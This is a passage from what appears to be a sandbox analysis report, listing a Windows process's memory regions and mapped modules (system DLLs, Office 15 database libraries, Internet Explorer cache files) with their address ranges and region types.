"c:\\windows\\system32\\oleacc.dll") Region: id = 443 start_va = 0x7fef5290000 end_va = 0x7fef5e46fff entry_point = 0x7fef5290000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 444 start_va = 0x8810000 end_va = 0x8810fff entry_point = 0x8810000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 445 start_va = 0x8820000 end_va = 0x8821fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008820000" filename = "" Region: id = 446 start_va = 0x8830000 end_va = 0x8830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008830000" filename = "" Region: id = 447 start_va = 0x8840000 end_va = 0x8840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008840000" filename = "" Region: id = 448 start_va = 0xa990000 end_va = 0xaa8ffff entry_point = 0x0 
region_type = private name = "private_0x000000000a990000" filename = "" Region: id = 449 start_va = 0x7fef7fc0000 end_va = 0x7fef803ffff entry_point = 0x7fef7fc0000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 450 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 451 start_va = 0x8f40000 end_va = 0x8f95fff entry_point = 0x8f40000 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 452 start_va = 0x7fef8040000 end_va = 0x7fef804efff entry_point = 0x7fef8040000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 453 start_va = 0x7fefba50000 end_va = 0x7fefba5afff entry_point = 0x7fefba50000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 454 start_va = 0x3df0000 end_va = 0x3df3fff entry_point = 0x3df0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 455 start_va = 0x90f0000 end_va = 0x91effff entry_point = 0x0 region_type = private name = "private_0x00000000090f0000" filename = "" Region: id = 456 start_va = 0x9200000 end_va = 0x92fffff entry_point = 0x0 region_type = private name = "private_0x0000000009200000" filename = "" Region: id = 457 start_va = 0xa5c0000 end_va = 0xa7bffff entry_point = 0x0 region_type = private name = "private_0x000000000a5c0000" filename = "" Region: id = 458 start_va = 0xa8d0000 end_va = 
0xa9cffff entry_point = 0x0 region_type = private name = "private_0x000000000a8d0000" filename = "" Region: id = 459 start_va = 0xaae0000 end_va = 0xabdffff entry_point = 0x0 region_type = private name = "private_0x000000000aae0000" filename = "" Region: id = 460 start_va = 0x7fef7470000 end_va = 0x7fef760bfff entry_point = 0x7fef7470000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 461 start_va = 0x7fef1c80000 end_va = 0x7fef1cf2fff entry_point = 0x7fef1c80000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 462 start_va = 0x3e00000 end_va = 0x3e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 463 start_va = 0x7fef9980000 end_va = 0x7fef9997fff entry_point = 0x7fef9980000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 464 start_va = 0xabe0000 end_va = 0xbf35fff entry_point = 0xabe0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 465 start_va = 0x71720000 end_va = 0x72a75fff entry_point = 0x71720000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 466 start_va = 0x7fef9dc0000 end_va = 0x7fef9dc9fff entry_point = 0x7fef9dc0000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 467 start_va = 0x7fef1c50000 end_va = 0x7fef1c71fff entry_point = 0x7fef1c50000 region_type = mapped_file name = "ntlanman.dll" filename = 
"\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 468 start_va = 0x3e10000 end_va = 0x3e10fff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 469 start_va = 0x7fef7b00000 end_va = 0x7fef7bedfff entry_point = 0x7fef7b00000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 470 start_va = 0x3e20000 end_va = 0x3e21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e20000" filename = "" Region: id = 471 start_va = 0x7fee9d60000 end_va = 0x7fee9fd0fff entry_point = 0x7fee9d60000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 472 start_va = 0x7fef7f60000 end_va = 0x7fef7f9afff entry_point = 0x7fef7f60000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 473 start_va = 0x3e30000 end_va = 0x3e30fff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 474 start_va = 0x3e40000 end_va = 0x3e40fff entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 475 start_va = 0x3e50000 end_va = 0x3e51fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 476 start_va = 0x3e60000 end_va = 0x3e68fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 477 start_va = 0x3e70000 end_va = 0x3e72fff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 478 start_va = 0x3e80000 end_va = 0x3e82fff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 
479 start_va = 0x3f70000 end_va = 0x406ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 480 start_va = 0x7fef9a40000 end_va = 0x7fef9afcfff entry_point = 0x7fef9a40000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 481 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 482 start_va = 0xa9d0000 end_va = 0xaacffff entry_point = 0x0 region_type = private name = "private_0x000000000a9d0000" filename = "" Region: id = 483 start_va = 0x7fef80e0000 end_va = 0x7fef8114fff entry_point = 0x7fef80e0000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 484 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 485 start_va = 0x7fef1c20000 end_va = 0x7fef1c46fff entry_point = 0x7fef1c20000 region_type = mapped_file name = "ehstorapi.dll" filename = "\\Windows\\System32\\EhStorAPI.dll" (normalized: "c:\\windows\\system32\\ehstorapi.dll") Region: id = 486 start_va = 0x2b30000 end_va = 0x2b30fff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 487 start_va = 0x2b40000 end_va = 0x2b41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b40000" filename = "" Region: id = 488 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003350000" filename = "" Region: id = 489 start_va = 0x3570000 end_va = 0x3570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003570000" filename = "" Region: id = 490 start_va = 
0x3590000 end_va = 0x3590fff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 491 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 492 start_va = 0x9d90000 end_va = 0x9e3afff entry_point = 0x9d90000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 493 start_va = 0x9f70000 end_va = 0x9feffff entry_point = 0x0 region_type = private name = "private_0x0000000009f70000" filename = "" Region: id = 494 start_va = 0xa090000 end_va = 0xa10ffff entry_point = 0x0 region_type = private name = "private_0x000000000a090000" filename = "" Region: id = 495 start_va = 0xabe0000 end_va = 0xbbdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000abe0000" filename = "" Region: id = 496 start_va = 0x7fef1d70000 end_va = 0x7fef1e7dfff entry_point = 0x7fef1d70000 region_type = mapped_file name = "oledb32.dll" filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll") Region: id = 497 start_va = 0x7fef2340000 end_va = 0x7fef2367fff entry_point = 0x7fef2340000 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 498 start_va = 0x7fefd500000 end_va = 0x7fefd521fff entry_point = 0x7fefd500000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 499 start_va = 0xa7a0000 end_va = 0xa81ffff entry_point = 0x0 region_type = private name = "private_0x000000000a7a0000" filename = "" Region: id = 500 start_va = 0x75500000 end_va = 0x75513fff entry_point = 0x75500000 region_type = mapped_file name = "oledb32r.dll" filename = "\\Program 
Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll") Region: id = 501 start_va = 0x7fee9e50000 end_va = 0x7fee9ffffff entry_point = 0x7fee9e50000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 502 start_va = 0x7feea740000 end_va = 0x7feea75dfff entry_point = 0x7feea740000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 503 start_va = 0xbbe0000 end_va = 0xbf22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bbe0000" filename = "" Region: id = 504 start_va = 0x75860000 end_va = 0x75862fff entry_point = 0x75860000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 505 start_va = 0x7fefaaa0000 end_va = 0x7fefaaaffff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 506 start_va = 0x7feec6d0000 end_va = 0x7feecd5afff entry_point = 0x7feec6d0000 region_type = mapped_file name = "csi.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\csi.dll") Region: id = 507 start_va = 0x7fefb540000 end_va = 0x7fefb54afff entry_point = 0x7fefb540000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 508 start_va = 0x7fefb550000 end_va = 0x7fefb576fff entry_point = 0x7fefb550000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 509 
start_va = 0x7fefe0a0000 end_va = 0x7fefe0a7fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 510 start_va = 0x7feff950000 end_va = 0x7feff99cfff entry_point = 0x7feff950000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 511 start_va = 0x7fefbb60000 end_va = 0x7fefbb8ffff entry_point = 0x7fefbb60000 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 512 start_va = 0x7fefce40000 end_va = 0x7fefce5dfff entry_point = 0x7fefce40000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 513 start_va = 0x7fefd580000 end_va = 0x7fefd5aefff entry_point = 0x7fefd580000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 514 start_va = 0x3580000 end_va = 0x358ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003580000" filename = "" Region: id = 515 start_va = 0x35a0000 end_va = 0x35affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035a0000" filename = "" Region: id = 516 start_va = 0x3dd0000 end_va = 0x3ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 517 start_va = 0x3de0000 end_va = 0x3deffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 518 start_va = 0x9e60000 end_va = 0x9f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009e60000" filename = "" Region: id = 519 start_va = 0xa5c0000 end_va = 0xa6bffff entry_point 
= 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a5c0000" filename = "" Region: id = 520 start_va = 0x7fef2480000 end_va = 0x7fef24eefff entry_point = 0x7fef2480000 region_type = mapped_file name = "aceoledb.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\aceoledb.dll") Region: id = 521 start_va = 0x7feec480000 end_va = 0x7feec6c9fff entry_point = 0x7feec480000 region_type = mapped_file name = "acecore.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\acecore.dll") Region: id = 522 start_va = 0x7fef1a50000 end_va = 0x7fef1b24fff entry_point = 0x7fef1a50000 region_type = mapped_file name = "acewstr.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\acewstr.dll") Region: id = 523 start_va = 0x3e30000 end_va = 0x3e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 524 start_va = 0xbf30000 end_va = 0xff2ffff entry_point = 0x0 region_type = private name = "private_0x000000000bf30000" filename = "" Region: id = 525 start_va = 0xffd0000 end_va = 0x100cffff entry_point = 0x0 region_type = private name = "private_0x000000000ffd0000" filename = "" Region: id = 526 start_va = 0x10230000 end_va = 0x1032ffff entry_point = 0x0 region_type = private name = "private_0x0000000010230000" filename = "" Region: id = 527 start_va = 0x10420000 end_va = 0x1051ffff entry_point = 0x0 region_type = private name = "private_0x0000000010420000" filename = "" Region: id = 528 start_va = 0x7feec3a0000 end_va = 0x7feec479fff entry_point = 0x7feec3a0000 region_type = mapped_file name = "acees.dll" filename = "\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE15\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\acees.dll") Region: id = 529 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 530 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 531 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 532 start_va = 0x7fef2330000 end_va = 0x7fef2336fff entry_point = 0x7fef2330000 region_type = mapped_file name = "vbajet32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\VBAJET32.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\vbajet32.dll") Region: id = 533 start_va = 0x7fef22c0000 end_va = 0x7fef2328fff entry_point = 0x7fef22c0000 region_type = mapped_file name = "expsrv.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\EXPSRV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\expsrv.dll") Region: id = 534 start_va = 0x3e40000 end_va = 0x3e49fff entry_point = 0x3e40000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 535 start_va = 0x3e50000 end_va = 0x3e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 536 start_va = 0x3e60000 end_va = 0x3e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 537 start_va = 0x3e70000 end_va = 0x3e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 538 start_va = 0x7fefb820000 end_va = 0x7fefb946fff entry_point = 0x7fefb820000 region_type = mapped_file name = 
"taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 539 start_va = 0x3e30000 end_va = 0x3e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e30000" filename = "" Region: id = 540 start_va = 0x3e80000 end_va = 0x3e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 541 start_va = 0x3ea0000 end_va = 0x3eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ea0000" filename = "" Region: id = 542 start_va = 0x3eb0000 end_va = 0x3ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003eb0000" filename = "" Region: id = 543 start_va = 0x3ec0000 end_va = 0x3ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ec0000" filename = "" Region: id = 544 start_va = 0x3ed0000 end_va = 0x3edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 545 start_va = 0x3ee0000 end_va = 0x3eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 546 start_va = 0x3f40000 end_va = 0x3f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f40000" filename = "" Region: id = 547 start_va = 0x3f50000 end_va = 0x3f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 548 start_va = 0x3f60000 end_va = 0x3f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f60000" filename = "" Region: id = 549 start_va = 0x4130000 end_va = 0x4131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004130000" filename = "" Region: id = 550 start_va = 0x105f0000 end_va = 0x106effff entry_point = 0x0 region_type = private name = "private_0x00000000105f0000" filename = "" Region: id = 551 
start_va = 0x7fefa2b0000 end_va = 0x7fefa323fff entry_point = 0x7fefa2b0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 552 start_va = 0x7fefba70000 end_va = 0x7fefba84fff entry_point = 0x7fefba70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 553 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 554 start_va = 0x10210000 end_va = 0x1021ffff entry_point = 0x0 region_type = private name = "private_0x0000000010210000" filename = "" Region: id = 555 start_va = 0x7fefa010000 end_va = 0x7fefa01bfff entry_point = 0x7fefa010000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 556 start_va = 0x3e60000 end_va = 0x3e61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e60000" filename = "" Region: id = 557 start_va = 0x4350000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 558 start_va = 0x74330000 end_va = 0x7435afff entry_point = 0x74330000 region_type = mapped_file name = "atl100.dll" filename = "\\Windows\\System32\\atl100.dll" (normalized: "c:\\windows\\system32\\atl100.dll") Region: id = 559 start_va = 0x77d10000 end_va = 0x77d12fff entry_point = 0x77d10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 560 start_va = 0x7fef91c0000 end_va = 0x7fef93fcfff entry_point = 0x7fef91c0000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\GROOVEEX.DLL" (normalized: 
"c:\\progra~1\\micros~1\\office15\\grooveex.dll") Region: id = 561 start_va = 0x4340000 end_va = 0x4341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004340000" filename = "" Region: id = 562 start_va = 0x4350000 end_va = 0x4357fff entry_point = 0x4350000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 563 start_va = 0x4360000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 564 start_va = 0x4370000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 565 start_va = 0x4980000 end_va = 0x4993fff entry_point = 0x4980000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 566 start_va = 0x49a0000 end_va = 0x49affff entry_point = 0x49a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 567 start_va = 0x10200000 end_va = 0x1020ffff entry_point = 0x0 region_type = private name = "private_0x0000000010200000" filename = "" Region: id = 568 start_va = 0x7fefd1b0000 end_va = 0x7fefd20afff entry_point = 0x7fefd1b0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 569 start_va = 0x107d0000 end_va = 0x1084ffff entry_point = 
0x0 region_type = private name = "private_0x00000000107d0000" filename = "" Region: id = 570 start_va = 0x7fef6090000 end_va = 0x7fef60f1fff entry_point = 0x7fef6090000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 571 start_va = 0x7fef99a0000 end_va = 0x7fef99bbfff entry_point = 0x7fef99a0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 572 start_va = 0x7fefb5a0000 end_va = 0x7fefb5b0fff entry_point = 0x7fefb5a0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 573 start_va = 0x10970000 end_va = 0x10a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000010970000" filename = "" Region: id = 574 start_va = 0x7fef22b0000 end_va = 0x7fef22b8fff entry_point = 0x7fef22b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 575 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 576 start_va = 0x56d0000 end_va = 0x56dffff entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 577 start_va = 0x7fefab90000 end_va = 0x7fefab97fff entry_point = 0x7fefab90000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 578 start_va = 0x10b60000 end_va = 0x10c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000010b60000" filename = "" Region: id = 579 start_va = 0x7fef99f0000 end_va = 0x7fef9a04fff entry_point = 0x7fef99f0000 region_type = mapped_file name = 
"napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 580 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 581 start_va = 0x7fef99d0000 end_va = 0x7fef99e8fff entry_point = 0x7fef99d0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 582 start_va = 0x7fefd330000 end_va = 0x7fefd384fff entry_point = 0x7fefd330000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 583 start_va = 0x7fef99c0000 end_va = 0x7fef99cafff entry_point = 0x7fef99c0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 584 start_va = 0x7fefcd30000 end_va = 0x7fefcd36fff entry_point = 0x7fefcd30000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 585 start_va = 0x7fefd320000 end_va = 0x7fefd326fff entry_point = 0x7fefd320000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 586 start_va = 0x7fefb3f0000 end_va = 0x7fefb442fff entry_point = 0x7fefb3f0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 587 start_va = 0x10d90000 end_va = 0x10e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000010d90000" filename = "" Region: id = 588 start_va = 0x7fefb3a0000 end_va = 0x7fefb3b7fff entry_point = 0x7fefb3a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = 
"\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 589 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d0fff entry_point = 0x7fefb3c0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 590 start_va = 0x100d0000 end_va = 0x101cffff entry_point = 0x0 region_type = private name = "private_0x00000000100d0000" filename = "" Region: id = 591 start_va = 0x10c70000 end_va = 0x10d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000010c70000" filename = "" Region: id = 592 start_va = 0x10f60000 end_va = 0x1105ffff entry_point = 0x0 region_type = private name = "private_0x0000000010f60000" filename = "" Region: id = 593 start_va = 0x111b0000 end_va = 0x112affff entry_point = 0x0 region_type = private name = "private_0x00000000111b0000" filename = "" Region: id = 594 start_va = 0x7fefd9a0000 end_va = 0x7fefda30fff entry_point = 0x7fefd9a0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 595 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = 